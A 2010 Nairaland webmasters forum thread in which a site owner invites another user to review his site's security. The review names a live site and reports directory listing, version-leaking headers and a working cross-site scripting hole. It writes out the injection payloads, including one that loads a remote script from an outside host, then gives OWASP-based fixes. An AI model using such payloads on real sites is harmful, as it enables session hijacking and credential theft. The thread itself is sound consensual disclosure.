Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / NewStats: 3,192,449 members, 7,947,832 topics. Date: Friday, 13 September 2024 at 09:30 AM |
Nairaland Forum / Science/Technology / Webmasters / Security Alert (982 Views)
Security Alert On Nairaland / Security Alert: If You Should Receive An Email Titled "Email Alert Notification" (2) (3) (4)
Security Alert by Nobody: 4:41pm On Sep 21, 2010 |
Please Nairaland site owners, and webmasters, tighten up security, a lot of Hackers this days are not smiling, mostly this script kiddies! Ensure your contact area and most forms, mail your email the values rather than save in a database, and if you decide making use of a database for most applications, tighten up security! I received 1700 attempted tries to hack my site with various scripts and calls to major hack sites, using their precoded script! All hit my Inbox rather than my Database! Currently battling deleting those junks and improving my security, based on studying the pattern implored. Also try reading some security advice proffered in this thread https://www.nairaland.com/nigeria/topic-513276.0.html |
Re: Security Alert by Nobody: 6:28pm On Sep 21, 2010 |
well apart from that ave been getting weird messages from females that they saw my profile on nairaland and wanted to know me at first i believed it but after like 10 emails like that, i know yahoo yahoo boys are at work cuz i have never gotten that amount of babe on my case it's not realistic, logical reasoning, |
Re: Security Alert by Nobody: 7:26pm On Sep 21, 2010 |
@PC, You too like woman jor, How you go believe that kind rubbish, i receive one like that yesterday, i delete am sharp sharp, Serious i think i know the person that tried hacking me, i will send him a serious mail now. If him try that kind thing again, i go show am say i be Benin Man. Before then, i go go warn him Papa! Since na Script Kiddie! **sMileZ** |
Re: Security Alert by Slyr0x: 10:38pm On Sep 21, 2010 |
lool, U might be right about everything but did u say 'Script Kiddie'? To start with, your site --> http://www.marknollis.com/ is as vulnerable as hell. I can help with a Full Disclosure(thats if you want one) or perhaps post the disclosure after you've got everything patched! BTW The thread https://www.nairaland.com/nigeria/topic-513276.0.html doesnt seem to say anything bout the method of attack. |
Re: Security Alert by Nobody: 10:52pm On Sep 21, 2010 |
Bros, Feel free, It's for learning and improvement na! Oya review the security! |
Re: Security Alert by Slyr0x: 11:47pm On Sep 21, 2010 |
1.) To start with, Directory listing is allowed on the web server /scripts /images /css /js /chrometheme /chromejs/ /freebies /icons 2.) GET /checklogin.php discloses the Apache Version/PHP Version/OpenSSL Version/Frontpage Version in its header Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Now its getting serious, a lookup in a Vulnerability db of the Version of Apache being used will reveal how to exploit it. 3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, but data entered in the 'input' field will be cached by the browser of which anyone who has access to it can steal. 4.) Now this is the greatest of 'em, its called Cross Site Scripting XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. Now if you dont know the impact of XSS, U can read 'em here http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf -Theft of Accounts / Services -User Tracking / Statistics -Browser/ User exploitation -Hi-jacking users' active session -Changing the look of the page within the victims browser. -Mounting a successful phishing attack. -Intercept data and perform man-in-the-middle attacks. - and Countless others Mode of Attack - XSS URL: http://marknollis.com/student.php POST /apply_details.php In the Fill your name field, copy & paste this <SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT> and click on 'Apply Now'. You'll have d image below. Now u can do anyhing imaginable, i can call my site/call a javascript. Lets use http://ha.ckers.org/xss.js as an example, the javascript being called here is xss.js Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2 I can even load my blog on the page <iframe src=http://codename-intrusion..com <
|
Re: Security Alert by Slyr0x: 11:51pm On Sep 21, 2010 |
NL's spam bot just ate my review. |
Re: Security Alert by Slyr0x: 11:52pm On Sep 21, 2010 |
1.) To start with, Directory listing is allowed on the web server /scripts /images /css /js /chrometheme /chromejs/ /freebies /icons 2.) GET /checklogin.php discloses the Apache Version/PHP Version/OpenSSL Version/Frontpage Version in its header Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Now its getting serious, a lookup in a Vulnerability db of the Version of Apache being used will reveal how to exploit it. 3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, but data entered in the 'input' field will be cached by the browser of which anyone who has access to it can steal. |
Re: Security Alert by Slyr0x: 11:53pm On Sep 21, 2010 |
4.) Now this is the greatest of 'em, its called Cross Site Scripting XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. Now if you dont know the impact of XSS, U can read 'em here http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf -Theft of Accounts / Services -User Tracking / Statistics -Browser/ User exploitation -Hi-jacking users' active session -Changing the look of the page within the victims browser. -Mounting a successful phishing attack. -Intercept data and perform man-in-the-middle attacks. - and Countless others Mode of Attack - XSS URL: http://marknollis.com/student.php POST /apply_details.php In the Fill your name field, copy & paste this <SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT> and click on 'Apply Now'. You'll have d image below. Now u can do anyhing imaginable, i can call my site/call a javascript. Lets use http://ha.ckers.org/xss.js as an example, the javascript being called here is xss.js Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2 I can even load my blog on the page <iframe src=http://codename-intrusion..com < |
Re: Security Alert by Slyr0x: 11:55pm On Sep 21, 2010 |
4.) Now this is the greatest of 'em, its called Cross Site Scripting XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. Now if you dont know the impact of XSS, U can read 'em here http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf -Theft of Accounts / Services -User Tracking / Statistics -Browser/ User exploitation -Hi-jacking users' active session -Changing the look of the page within the victims browser. -Mounting a successful phishing attack. -Intercept data and perform man-in-the-middle attacks. - and Countless others |
Re: Security Alert by 5lyr0x: 12:16am On Sep 22, 2010 |
The NL SpamBot just ate up the review again + my posting priviledges The concluding part http://pastebin.com/YC2PgJs6
|
Re: Security Alert by Nobody: 1:13am On Sep 22, 2010 |
Thanks, |
Re: Security Alert by Nobody: 1:15am On Sep 22, 2010 |
Forgot to strip off tags, Generally the validation was poor! Thanks Once again! |
Re: Security Alert by Nobody: 1:21am On Sep 22, 2010 |
Now, how can i solve problem one and two, Guess from host As for the Permission of script, No mind me, when i wrote the code, forgot to script tags, Have done that now, Please try and feed me back! Thanks Oga |
Re: Security Alert by 5lyr0x: 2:05am On Sep 22, 2010 |
Donpuzo:Yeah. Donpuzo: Nothing has changed. I was able to inject the page. Donpuzo: Yeah Slyr0x. Am having issues with that username. Can U pls help me put pressure on 'em MODs. Got this smwhere [Quote] The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server. Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input. [/Quote] Use this article --> http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet |
(1) (Reply)
Интересная музыка / Nis Website Design / PROMO: N1,000 Domain Names And 20% Hosting Discount
(Go Up)
Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 33 |